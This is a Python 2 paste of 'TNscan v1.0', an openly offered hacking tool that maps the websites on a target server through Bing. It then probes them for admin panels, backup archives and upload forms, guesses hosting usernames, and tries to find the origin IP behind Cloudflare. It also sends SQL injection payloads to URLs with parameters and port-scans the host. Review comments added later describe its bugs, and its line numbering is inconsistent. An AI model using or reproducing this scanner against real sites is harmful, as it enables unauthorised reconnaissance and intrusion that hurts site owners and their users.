SaintDruG

TNscan v1.0

May 29th, 2016
  1. #!/usr/bin/env python2
  2. # >>> Bism Allah <<<
  3. # Code Name : TNscan v1.0
  4. # Coder     : MatriX Coder (17 yo guy from Tunisia)
  5. # Blog      : www.matrixcoder.co.vu  
  6. # Twitter   : MatriX_Coder
  7. # Pastebin  : www.pastebin.com/u/matrixcoder
  8. # this a developed version of al-swisre code (well i think it's even better) anyway greats to that man
  9. # Greats to : all Muslim (ethical and unethical) Hackers who are fighting for an issue
  10. #              greats also to tunisia fallega team and to madleets team and to you !
  11. # Wroten with <3 in my arch machine using geany, a cup of tea and while listening to jazz
  12.  
  13. import re, urllib2, urllib, os, socket, sys
  14. from platform import system
# Startup banner, printed from __main__ and again after every menu round.
# NOTE(review): the row ending in "'_ \" has a bare backslash before the
# newline; inside a (non-raw) triple-quoted string that is a line
# continuation, so that row and the one below it print as a single line.
logo = """
\t _____ _   _                    
\t|_   _| \ | |                    
\t  | | |  \| |___  ___ __ _ _ __  
\t  | | | . ` / __|/ __/ _` | '_ \
\t  | | | |\ \__ \ (_| (_| | | | |
\t  \_/ \_| \_/___/\___\__,_|_| |_| v1.0
                                                 
"""
  24.  
# Menu text shown by TNscan.__init__.  Option 9 is listed but has no
# handler in the dispatch loop (crawlSqli is an empty stub), so choosing
# it just falls through to the "Continue" prompt.
menu = """
1) Get all websites
2) Get joomla websites
3) Get wordpress websites
4) Find control panel
5) Find zip files
6) Find upload files
7) Get server users
8) Scan from SQL injection
9) Crawl and scan from SQL injection (soon)
10) Scan ports (range of ports)
11) Scan ports (common ports  )
12) Get server banner
13) Bypass Cloudflare
14) About !
99) Exit
"""
def unique(seq):
    """
    Return the elements of *seq* with duplicates removed, keeping the
    order of first appearance (unlike ``list(set(seq))``).

    Elements must be hashable because membership is tracked in a set.
    """
    seen = set()
    result = []
    for item in seq:
        if item in seen:
            continue
        seen.add(item)
        result.append(item)
    return result
  48.    
def clearScr() :
    """
    Clear the terminal: ``clear`` on GNU/Linux, ``cls`` on Windows.

    On any other platform nothing is executed.  The command string is
    fixed (no user input reaches os.system here).
    """
    commands = {'Linux': 'clear', 'Windows': 'cls'}
    cmd = commands.get(system())
    if cmd is not None:
        os.system(cmd)
  58.  
class TNscan :
    """
    Interactive reconnaissance session against a single server IP.

    Every menu option is an active probe: Bing "ip:" searches, direct
    HTTP requests to the sites Bing attributes to the IP, DNS lookups,
    or raw TCP connects.  NOTE(review): run this only against hosts you
    are authorised to test.  None of the urllib/urllib2/socket calls
    below set a timeout (the one in portScanner is commented out), so a
    single unresponsive host can stall an option for a long time.
    """
    def __init__(self, serverip) :
        """
        Remember the target, pre-load self.sites, then run the menu loop
        until the user picks 99 or answers 'N' at the continue prompt.

        serverip -- target IP/host string, used verbatim in the Bing
                    queries, the banner request and the port scanner.
        """
        self.serverip = serverip
        # Populate self.sites up front: options 4, 5, 6, 7 and 13 iterate it.
        self.getSites(False)
        print menu
        while True :
            choice = raw_input(' Enter choice -> ')
            if choice == '1' :
                self.getSites(True)
            elif choice == '2' :
                self.getJoomla()
            elif choice == '3' :
                self.getWordpress()
            elif choice == '4' :
                self.findPanels()
            elif choice == '5' :
                self.findZip()
            elif choice == '6' :
                self.findUp()
            elif choice == '7' :
                self.getUsers()
            elif choice == '8' :
                self.grabSqli()
            # There is no branch for '9' (crawlSqli is a stub); that input,
            # like any unrecognised one, drops straight to the continue prompt.
            elif choice == '10' :
                ran = raw_input(' Enter range of ports, (ex : 1-1000) -> ')
                self.portScanner(1, ran)
            elif choice == '11' :
                self.portScanner(2, None)
            elif choice == '12' :
                self.getServerBanner()
            elif choice == '13' :
                self.cloudflareBypasser()
            elif choice == '14' :
                self.aboutME()
            elif choice == '99' :
                print ' Goodbye'
                exit()
            con = raw_input(' Continue [Y/n] -> ')
            # NOTE(review): an empty answer makes con[0] raise IndexError,
            # which the handler in __main__ then reports as a usage error.
            if con[0].upper() == 'N' :
                exit()
            else :
                clearScr()
                print logo
                print menu
       
    def aboutME(self) :
        """
        Clear the screen and print the author banner (the same text as
        the comment header at the top of the file).
        """
        clearScr()
        print """
>>> Bism Allah <<<
Code Name : TNscan v1.0
Coder     : MatriX Coder (17 yo guy from Tunisia)
Blog      : www.matrixcoder.co.vu  
Twitter   : MatriX_Coder
Pastebin  : www.pastebin.com/u/matrixcoder
this a developed version of al-swisre code (well i think it's even better) anyway greats to that man
Greats to : all Muslim (ethical and unethical) Hackers who are fighting for an issue
        greats also to tunisian fallega team, to madleets team and to you !
Wroten with <3 in my arch machine using geany, a cup of tea and while listening to jazz
"""
   
    def getSites(self, a) :
        """
        Collect the websites Bing lists for "ip:<serverip>" into self.sites.

        Three result pages are requested (first=1, 51, 101 with count=50).
        Every '<h2><a href="..."' link is reduced to its host and rewritten
        as 'http://www.<host>/' unless the host already contains 'www', in
        which case it becomes 'http://<host>/'.  The list is de-duplicated
        with unique() before being stored.

        a -- when True, also clear the screen and print the list.

        NOTE(review): the 'http://(.*?)/' regex keeps http:// links only, so
        https results are silently dropped.  A urllib2.URLError is swallowed,
        but 'page += 50' sits inside the try, so a persistent Bing failure
        re-requests the same page forever.  The printed count is len(lista)
        (before de-duplication) while the lines printed come from the
        de-duplicated self.sites, so the two can disagree.
        """
        lista = []
        page = 1
        while page <= 101:
            try:
                bing = "http://www.bing.com/search?q=ip%3A" + self.serverip + "+&count=50&first=" + str(page)
                openbing = urllib2.urlopen(bing)
                readbing = openbing.read()
                findwebs = re.findall('<h2><a href="(.*?)"', readbing)
                for i in range(len(findwebs)):
                    allnoclean = findwebs[i]
                    findall1 = re.findall('http://(.*?)/', allnoclean)
                    for idx, item in enumerate(findall1):
                        # Substring test: any host containing 'www' (not only a
                        # 'www.' prefix) is left as-is.
                        if 'www' not in item:
                            findall1[idx] = 'http://www.' + item + '/'
                        else:
                            findall1[idx] = 'http://' + item + '/'
                    lista.extend(findall1)
                   
                page += 50
            except urllib2.URLError:
                pass
        self.sites = unique(lista)
        if a :     
            clearScr()
            print '[*] Found ', len(lista), ' Website\n'
            for site in self.sites :
                print site
           
    def getWordpress(self) :
        """
        List sites on the server that Bing indexes with a '?page_id='
        query (the author's WordPress fingerprint).

        Same three-page Bing loop as getSites(); each result link is cut
        at '?page_id=' and the prefix kept.  Results are de-duplicated,
        then the screen is cleared and the list printed.

        NOTE(review): the bare 'except:' hides every error, and because
        'page += 50' is inside the try a persistent failure loops forever.
        """
        lista = []
        page = 1
        while page <= 101:
            try:
                bing = "http://www.bing.com/search?q=ip%3A" + self.serverip + "+?page_id=&count=50&first=" + str(page)
                openbing = urllib2.urlopen(bing)
                readbing = openbing.read()
                findwebs = re.findall('<h2><a href="(.*?)"', readbing)
                for i in range(len(findwebs)):
                    wpnoclean = findwebs[i]
                    findwp = re.findall('(.*?)\?page_id=', wpnoclean)
                    lista.extend(findwp)
                page += 50
            except:
                pass
        lista = unique(lista)
        clearScr()
        print '[*] Found ', len(lista), ' Wordpress Website\n'
        for site in lista :
            print site

    def getJoomla(self) :
        """
        List sites on the server that Bing indexes with 'index.php?option=com'
        (the author's Joomla fingerprint).

        Same three-page Bing loop as getSites(); each result link is cut
        at 'index.php' and the prefix kept (the '.' in the pattern is
        unescaped, so it matches any character).

        NOTE(review): unlike the sibling methods there is no try/except
        here, so one failed Bing request raises out of the menu loop;
        __main__ only catches IndexError, so the session dies with a
        traceback.
        """
        lista = []
        page = 1
        while page <= 101:
            bing = "http://www.bing.com/search?q=ip%3A" + self.serverip + "+index.php?option=com&count=50&first=" + str(page)
            openbing = urllib2.urlopen(bing)
            readbing = openbing.read()
            findwebs = re.findall('<h2><a href="(.*?)"', readbing)
            for i in range(len(findwebs)):
                jmnoclean = findwebs[i]
                findjm = re.findall('(.*?)index.php', jmnoclean)
                lista.extend(findjm)
            page += 50
        lista = unique(lista)
        clearScr()
        print '[*] Found ', len(lista), ' Joomla Website\n'
        for site in lista :
            print site

       
    def findPanels(self) :
        """
        Request every candidate admin path under each site in self.sites
        and print those that answer HTTP 200.

        NOTE(review): the status code is the only check.  urllib.urlopen
        follows redirects, so a host that redirects unknown paths to its
        home page, or serves a 200 "not found" page, reports every entry.
        Nothing here is caught, so an IOError from one host aborts the
        whole scan, and the response objects are never closed.
        """
        adminList = ['admin/', 'site/admin', 'admin.php/', 'up/admin/', 'central/admin/', 'whm/admin/', 'whmcs/admin/', 'support/admin/', 'upload/admin/', 'video/admin/', 'shop/admin/', 'shoping/admin/', 'wp-admin/', 'wp/wp-admin/', 'blog/wp-admin/', 'admincp/', 'admincp.php/', 'vb/admincp/', 'forum/admincp/', 'up/admincp/', 'administrator/', 'administrator.php/', 'joomla/administrator/', 'jm/administrator/', 'site/administrator/', 'install/', 'vb/install/', 'dimcp/', 'clientes/', 'admin_cp/', 'login/', 'login.php', 'site/login', 'site/login.php', 'up/login/', 'up/login.php', 'cp.php', 'up/cp', 'cp', 'master', 'adm', 'member', 'control', 'webmaster', 'myadmin', 'admin_cp', 'admin_site']
        clearScr()
        for site in self.sites :
            for admin in adminList :
                if urllib.urlopen(site + admin).getcode() == 200 :
                    print " [*] Found admin panel -> ", site + admin
   
    def findZip(self) :
        """
        Request every candidate backup/archive path under each site in
        self.sites and print those that answer HTTP 200.

        NOTE(review): same caveats as findPanels(): status code only (a
        catch-all 200 page reports every entry), no error handling, and
        responses are never closed.
        """
        zipList = ['backup.tar.gz', 'backup/backup.tar.gz', 'backup/backup.zip', 'vb/backup.zip', 'site/backup.zip', 'backup.zip', 'backup.rar', 'backup.sql', 'vb/vb.zip', 'vb.zip', 'vb.sql', 'vb.rar', 'vb1.zip', 'vb2.zip', 'vbb.zip', 'vb3.zip', 'upload.zip', 'up/upload.zip', 'joomla.zip', 'joomla.rar', 'joomla.sql', 'wordpress.zip', 'wp/wordpress.zip', 'blog/wordpress.zip', 'wordpress.rar']
        clearScr()
        for site in self.sites :
            for zip1 in zipList :
                if urllib.urlopen(site + zip1).getcode() == 200 :
                    print " [*] Found zip file -> ", site + zip1
                   
    def findUp(self) :
        """
        Request every candidate upload-script path under each site in
        self.sites; for those answering 200, fetch the page again and
        print a hit for every line containing the literal 'type=file'.

        NOTE(review): each hit costs two requests (status, then body).
        The pattern is literal, so the quoted form type="file" does not
        match.  One line is printed per matching line, so a page can be
        reported several times.  No error handling; responses never closed.
        """
        upList = ['up.php', 'up1.php', 'up/up.php', 'site/up.php', 'vb/up.php', 'forum/up.php','blog/up.php', 'upload.php', 'upload1.php', 'upload2.php', 'vb/upload.php', 'forum/upload.php', 'blog/upload.php', 'site/upload.php', 'download.php']
        clearScr()
        for site in self.sites :
            for up in upList :
                if (urllib.urlopen(site + up).getcode() == 200) :
                    html = urllib.urlopen(site + up).readlines()
                    for line in html :
                        if re.findall('type=file', line) :
                            print " [*] Found upload -> ", site+up
                       
    def getUsers(self) :
        """
        Guess hosting-account usernames from each site name: strip the
        scheme, dots, hyphens and slashes, then repeatedly shorten the
        result by one character (down to length 3) and query
        '/cgi-sys/guestbook.cgi?user=<candidate>', treating any reply
        that does not contain 'invalid username' as a hit.

        NOTE(review): as written this method cannot report anything.
        The request URL is '<candidate>/cgi-sys/...' with no scheme, so
        urllib2.urlopen raises ValueError on the first call; the final
        print loop reads 'userlist', which is never defined (the list is
        'userslist'); both errors are hidden by the bare 'except:' and
        the method returns silently.  clearScr() and the summary loop are
        also inside the per-site loop rather than after it.
        """
        userslist = []
        for site in self.sites :
            try:
                site = site.replace('http://www.', '')
                site = site.replace('http://', '')
                site = site.replace('.', '')
                if '-' in site:
                    site = site.replace('-', '')
                site = site.replace('/', '')

                while len(site) > 2:
                    # '%' binds tighter than '+': the candidate is both the
                    # host part and the user= value of this URL.
                    resp = urllib2.urlopen(site + '/cgi-sys/guestbook.cgi?user=%s' % site).read()
                    if 'invalid username' not in resp.lower():
                        print '\t [*] Found -> ', site
                        userslist.append(site)
                    else :
                        print site
                       
                    site = site[:-1]
                   
                clearScr()
                for user in userlist :
                    print user

            except:
                pass
           
    def cloudflareBypasser(self) :
        """
        For each site, resolve the apex and a few common subdomains
        (mail, webmail, ftp, direct, cpanel) and print any subdomain whose
        address differs from the apex, on the assumption that such a record
        points at the origin rather than the CDN.

        NOTE(review): str.replace returns a new string and the results on
        the first two lines are discarded, so 'site' still carries its
        'http://' prefix and trailing '/'.  gethostbyname therefore fails
        for the apex (swallowed by 'except socket.error'), leaving 'ip'
        unbound, and fails again for every 'sub.http://...' candidate, so
        only the '[~] Trying' lines are ever printed.  If a candidate did
        resolve while 'ip' was unbound, 'ddd != ip' would raise NameError,
        which the socket.error handler does not catch.
        """
        clearScr()
        subdoms = ['mail', 'webmail', 'ftp', 'direct', 'cpanel']
        for site in self.sites :
            site.replace('http://', '')
            site.replace('/', '')          
            try:
                ip = socket.gethostbyname(site)
            except socket.error:
                pass
            for sub in subdoms:
                doo = sub + '.' + site
                print ' [~] Trying -> ', doo
                try:
                    ddd = socket.gethostbyname(doo)
                    if ddd != ip:
                        print ' [*] Cloudflare bypassed -> ', ddd
                        break
                except socket.error :
                    pass
                       
    def getServerBanner(self) :
        """
        Fetch http://<serverip>/ and print the value of its 'Server'
        response header (None if the header is absent).

        NOTE(review): the bare 'except:' swallows every failure, so an
        unreachable host produces no output at all.  The response is
        never closed.
        """
        clearScr()
        try:
            s = 'http://' + self.serverip
            httpresponse = urllib.urlopen(s)
            print ' [*] Server header -> ', httpresponse.headers.getheader('server')
        except:
            pass
           
    def grabSqli(self) :
        """
        Collect the result links Bing returns for 'ip:<serverip> php?id='
        (three pages, as in getSites()), de-duplicate them and hand the
        list to checkSqli().

        Links are kept verbatim, including ones without a query string;
        checkSqli() skips those via its own except.  Here 'page += 50' is
        outside the try, so a Bing failure does not loop forever.
        """
        page = 1
        lista = []
        while page <= 101:
            try:
                bing = "http://www.bing.com/search?q=ip%3A" + self.serverip + "+php?id=&count=50&first=" + str(page)
                openbing = urllib2.urlopen(bing)
                readbing = openbing.read()
                findwebs = re.findall('<h2><a href="(.*?)"', readbing)
                for i in range(len(findwebs)):
                    x = findwebs[i]
                    lista.append(x)
            except:
                pass           
            page += 50 
        lista = unique(lista)      
        self.checkSqli(lista)
       
    def checkSqli(self, s):
        """
        Error-based SQL injection check (pattern list taken from the
        webpwn3r project, per the original author).

        For each URL in *s*, every 'key=value' element of its query string
        is suffixed with each payload in turn, the page is fetched, and any
        line matching the database-error regex prints the tested URL.

        s -- iterable of URL strings; entries without '?' raise IndexError
             on split('?')[1] and are skipped by the bare except.

        NOTE(review): url.replace(param, ...) replaces every occurrence of
        the parameter text, not just the one in the query string.  The
        regex alternative 'unterminated.+qoute' is misspelled, so that
        error message never matches (runtime string, left as-is here).
        The bare 'except:' also hides network errors, and one URL is
        printed once per matching line.
        """
        clearScr()
        payloads = ["3'", "3%5c", "3%27%22%28%29", "3'><", "3%22%5C%27%5C%22%29%3B%7C%5D%2A%7B%250d%250a%3C%2500%3E%25bf%2527%27"]
        check = re.compile("Incorrect syntax|mysql_fetch|Syntax error|Unclosed.+mark|unterminated.+qoute|SQL.+Server|Microsoft.+Database|Fatal.+error", re.I)
        for url in s:
            try:
                for param in url.split('?')[1].split('&'):
                    for payload in payloads:
                        power = url.replace(param, param + payload.strip())
                        #print power
                        html = urllib2.urlopen(power).readlines()
                        for line in html:
                            checker = re.findall(check, line)
                            if len(checker) != 0 :
                                print ' [*] SQLi found -> ', power
            except:
                pass
   
    def crawlSqli(self) :
        """
        Placeholder for a crawl-then-scan mode (menu option 9).
        Not implemented: the body is 'pass' and __init__ has no branch
        that calls it.
        """
        pass
   
    def portScanner(self, mode, ran) :
        """
        TCP connect scan of self.serverip.

        mode -- 1: scan the ports in *ran*; 2: scan a fixed list
                (80, 21, 22, 2082, 25, 53, 110, 443, 143) and ignore *ran*.
        ran  -- 'start-end' string for mode 1, parsed with split('-') and
                int(); a malformed value raises ValueError/IndexError.

        NOTE(review): range(start, end) excludes *end*, so '1-1000' scans
        1..999.  Sockets are never closed (the socket object is rebound to
        the int result of connect_ex and left to the GC), and with the
        settimeout line commented out each filtered port blocks for the
        OS connect timeout.
        """
        clearScr()
        def do_it(ip, port):
            """Print '[*] Port N is open' if a TCP connect to ip:port succeeds."""
            sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
            #sock.settimeout(5)
            sock = sock.connect_ex((ip,port))
            if sock == 0:
                print " [*] Port %i is open" % port
       
        if mode == 1 :
            a = ran.split('-')
            start = int(a[0])
            end = int(a[1])
            for i in range(start, end):
                do_it(self.serverip, i)
        elif mode == 2 :
            for port in [80,21,22,2082,25,53,110,443,143] :
                # didn't use multithreading cos it's few ports
                do_it(self.serverip, port)
  399.  
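if __name__ == '__main__' :
    # Check the argument explicitly.  The previous try/except IndexError
    # wrapped the whole session, so an IndexError raised inside TNscan
    # (an empty answer at the "Continue" prompt, a port range without a
    # '-') was also reported as a usage error and the real failure hidden.
    if len(sys.argv) < 2 :
        print " [*] Usage : python "+sys.argv[0]+" 127.0.0.1"
        sys.exit(1)
    clearScr()
    print logo
    # Interactive session; returns only when the user exits via the menu.
    TNscan(sys.argv[1])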